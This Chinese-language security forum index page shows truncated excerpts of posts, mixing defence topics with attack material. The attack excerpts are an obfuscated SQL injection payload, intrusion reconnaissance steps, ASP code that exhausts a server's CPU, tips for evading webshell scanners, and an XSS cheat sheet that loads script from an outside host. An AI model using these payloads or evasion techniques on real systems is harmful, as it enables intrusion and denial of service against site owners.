电脑病毒论坛 今日: 0|主题: 1421|排名: 18 

DDoS攻击手段是在传统的DoS攻击基础之上产生的一类攻击方式。单一的DoS攻击一般是采用一对一方式的，当被攻击目标CPU速度低、内存小或者网络带宽小等等各项性能指标不高,它的效果是明显的。随着计算机与网络技术的发展，计算机的处理能力迅速增长，内存大大增加，同时也出现了千兆级别的网络，这使得DoS攻击的困难程度加大 ...

今天朋友遇到一个问题，他的sql server 数据库被执行了一条语句dEcLaRe @s vArChAr(8000) sEt @s=0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624 ...

以Windows 2003为例，启动Windows 2003组策略点“开始”，在“运行”中敲入gpedit.msc依次展开“用户配置”→“管理模板”→“系统”子键，此时可以看到一个“不要运行指定的Windows应用程序”选项，双击该选项，在“策略”选项卡中选择&ld ...

【毛病表象】假造源地址进犯中，黑客机器向受害主机发送许多假造源地址的TCP SYN报文，占用安全网关的NAT会话资源，最终将安全网关的NAT会话表占满，招致局域网内一切人无法上彀。 　　【疾速查找】在WebUIà体系状况àNAT计算àNAT状况，可以看到“IP地址”一栏里边有许多不属于该内网IP网段 ...

蜜网是指另外采用了技术的蜜罐，从而以合理方式记录下黑客的行动，同时尽量减小或排除对因特网上其它系统造成的风险。建立在反向防火墙后面的蜜罐就是一个例子。防火墙的目的不是防止入站连接，而是防止蜜罐建立出站连接。不过，虽然这种方法使蜜罐不会破坏其它系统，但同时很容易被黑客发现。数据收集是设置蜜罐的另一项技 ...

标题有点大，当我们仔细分析后，实际上一般都是配置问题。 如果有人想攻击服务器时，都会扫描机器哪里有漏洞可以上传恶意脚本文件，上传脚本是第一步，当恶意的php脚本被上传到服务器时(其后缀可能是php，也可能伪装如jpg等其它后缀)，如果该脚本能被解析执行，那想攻击者就可以为所欲为了。那从源头上来避免这个问题可以从 ...

       为了避免基础架构即服务（IaaS）的安全问题，很多担心安全的企业使用一个简单的解决方案：在它们进入云端之前加密对象。不幸的是，这种方法对于减缓平台即服务（PaaS）的安全问题并不是最优的方案。 　　PaaS创造了数据访问和处理的环境。在PaaS环境中，数据必然会被访问、修改和存储 ...

首先把，主站入手 注册一个账号，看下上传点，等等之类的。 用google找下注入点，格式是 Site:XXX.com inurl:asp|php|aspx|jsp 最好不要带 www，因为不带的话可以检测二级域名。 扫目录，看编辑器和Fckeditor，看下敏感目录，有没有目录遍及， 查下是iis6,iis5.iis7，这些都有不同的利用方法 Iis6解析漏洞 Iis5远程溢出， I ...

命令注入攻击 PHP中可以使用下列5个函数来执行外部的应用程序或函数 system、exec、passthru、shell_exec、“(与shell_exec功能相同) 函数原型 string system(string command, int &return_var) command 要执行的命令 return_var 存放执行命令的执行后的状态值 string exec (string command, array &output, int &retu ...

对记事本内容过滤不严，导致Xss漏洞 修复方案：对url内容做内容检查，非url内容禁止插入

Skipfish是由google出品的一款自动化的网络安全扫描工具，该工具可以安装在linux、freebsd、MacOS X系统和windows(cygwin)。 谷歌工程师Michal Zalewski称，尽管Skipfish与Nikto和Nessus等其他开源扫描工具有相似的功能，但Skipfish还具备一些独特的优点。 Skipfish通过HTTP协议处理且占用较低的CPU资源，因此它的运行速度 ...

云火墙：   来源：思科推广ASA时定义第五代防火墙的一个文案概念；   技术：传通防火墙支持云端策略库更新与云端接入（SSLVPN）云端监控（Netflow)等与云相关的功能；   实体：还是部署在企业CPE侧与数据中心等网关位置。   云防火墙：   来源：国内个别做CDN的增加安全过滤功能后提出的说法； &n ...

在CMD   输入   nslookup    域名   例如:nslookup  www.baidu.com     有CDN的示例 Server:  cache3-gz   Address:  211.98.4.1         Non-authoritative answer:   Name:     Addresses:  119.75.217.109, 119. ...

大家都知道，普遍的防御XSS攻击的方法是在后台对以下字符进行转义：<、>、’、”，但是经过本人的研究发现，在一些特殊场景下，即使对以上字符进行了转义，还是可以执行XSS攻击的。首先看一个JS的例子：<script>    var s = "%u003c%u003e";    alert(s);</script>运行这段代码， ...

这类攻击有一个最大的特性，就是上传流量霎时增大，通常流量高达数十以至近百M，将整台效 劳器，以至将整台机柜的宽带堵住，使网站无法运转，而这样的攻击，我们无法从远程处理，一但那个phpshell运转，你的宽带将被全部占用，远程都无法 衔接。 　　被攻击后能做的只要联络机房的工作人员，让他进到你的效劳器里把你的IIS ...

原理就是通过执行死循环导致cpu跑满，不得不重启服务器，windows系统下可以通过停止w3wp.exe的方法解决，然后重启iis什么的把下面的代码保存为chongqi.asp，然后在访问，会占用CPU很高，管理员会重启。 复制代码代码如下: <% for i = 1 to 100 i = 10 next %> sqlserver下DB-OWNER权限重启服务器： 复制代码代码如下: while ...

0×00 前言 大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不足之前还请看官拍砖. 0×01 字符串上的舞蹈 一般标准的一句话Webshell是利用PHP的eval函数,动态执行其他函数功能.其 ...

(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号 <IMG SRC=javascript:alert(‘XSS’)> (4)IMG标签大小写不敏感 <IMG SRC=JaVaScRiPt:alert(‘XSS’)> (5)HTML ...

守住你的网站 防御DDoS攻击指南，随着Internet互联网络带宽的增加和多种DDOS黑客工具的日新月异的发展，DDOS拒绝服务攻击的实施越来越容易，DDOS攻击事件正在成上升趋势，解决DDOS攻击问题成为网络服务商必须考虑的头等大事。　　本文主要介绍了几种预防抵御DDOS的方法。　　一、为何要DDoS？　　随着Internet互联网络带宽 ...

近日，网站频频被黑。在网站里莫名其妙的多出一篇文 章，还有多出一组贴图。正在纳闷是谁可以登陆我的后台发表文章和图片的时候，我的qq弹出消息，一个陌生人给我发消息，说我的网站有漏洞，还说是他弄了我 的网站。不过还好，他给我详细说了黑我网站的方法，还提醒我好好修补修补，不然会被别人黑的。从他那得知，他用的是 ...